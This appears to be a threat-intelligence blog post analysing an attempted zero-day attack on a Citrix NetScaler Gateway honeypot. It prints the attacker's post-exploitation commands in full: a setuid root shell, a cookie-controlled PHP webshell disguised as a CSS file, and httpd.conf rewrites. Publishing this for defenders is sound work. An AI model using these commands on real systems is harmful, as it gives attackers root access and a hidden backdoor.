GreyNoise observes adversary activity through our Global Observation Grid (GOG), a network of sensors that draws attacker scanning and exploitation onto infrastructure we control. This lets us study adversary infrastructure, tooling, and tradecraft directly, without waiting for a victim investigation. GreyNoise also expands the GOG through Project Swarm, which enables the broader security community to join the effort. The activity discussed in this blog was derived from a Swarm participant sensor.
On 24 September 2026, a malicious cyber actor (MCA) used 149.104.78.141 to attempt zero-day exploitation against a Citrix NetScaler Gateway. At the time, there were no CVE-specific detections for the attack due to it occurring pre-disclosure. However, GreyNoise still detected and labeled the activity as fundamentally malicious within seconds due to behavioral detections. GreyNoise will not publish full details of the exploitation chain at this time. Patches are available and post-exploitation details are included below.
Exploitation before disclosure
Post-Exploitation
Though the adversary was unsuccessful in gaining a foothold on the targeted Swarm sensor, their post-exploitation playbook was revealed.
The MCA attempted to set both the Set User ID (setuid) and Set Group ID (setgid) bits on /bin/sh to obtain a root shell and install a password-protected webshell that accepts communication by the cookie value sent by the adversary. This may be to avoid persisting their commands in web logs. The MCA then attempted to configure the web server to treat their installed dot file (.ctxs.receiver - hidden by default) as a PHP file despite not having a .php extension. The MCA tried to create an alias which would route requests for a non-existent cascading style sheet (CSS) (receiver.min.css) to .ctxs.receiver; the MCA also attempted to create an additional AliasMatch setting which would provide similar functionality but allow for a more flexible pattern match so that variable characters added to the receiver.min.[0-9a-f].css file path would still route to the webshell. Lastly, the adversary attempted to kill the httpd process to restart the server.
chmod 6555 /bin/sh
mkdir -p /var/netscaler/logon/LogonPoint/custom
cat > /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver <<'EOF'
<?php header("Cache-Control: no-store, no-cache, must-revalidate");header("Pragma: no-cache");header("Expires: 0");if($_COOKIE["CsrfToken"]==="<REDACTED>"&&!empty($_COOKIE["NSC_TASS"]))passthru(urldecode($_COOKIE["NSC_TASS"])); ?>
EOF
grep -q ctxs.receiver /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/ "/var/netscaler/logon/"#){print qq( <Files ".ctxs.receiver">\n SetHandler application/x-httpd-php\n Header always set Cache-Control \"no-store, no-cache, must-revalidate\"\n Header always set Pragma \"no-cache\"\n </Files>\n Alias /logon/LogonPoint/custom/receiver.min.css "/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver"\n AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1} print' /etc/httpd.conf
grep -q 'AliasMatch .*receiver.min' /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/LogonPoint/custom/receiver.min.css#){print; print qq( AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1; next} print' /etc/httpd.conf
perl -pi -e 's/php_flag engine off/php_flag engine on /' /etc/httpd.conf
kill -HUP `cat /var/run/httpd.pid`
Indicators of Compromise
There are other indicators being shared in the community at a higher Traffic Light Protocol (TLP) level than we can put in this blog; none of the indicator sets should be considered exhaustive. Due to the nature of the vulnerability, adversaries have a wide range of options to poison server logs with variable malicious payloads as part of the exploitation sequence.








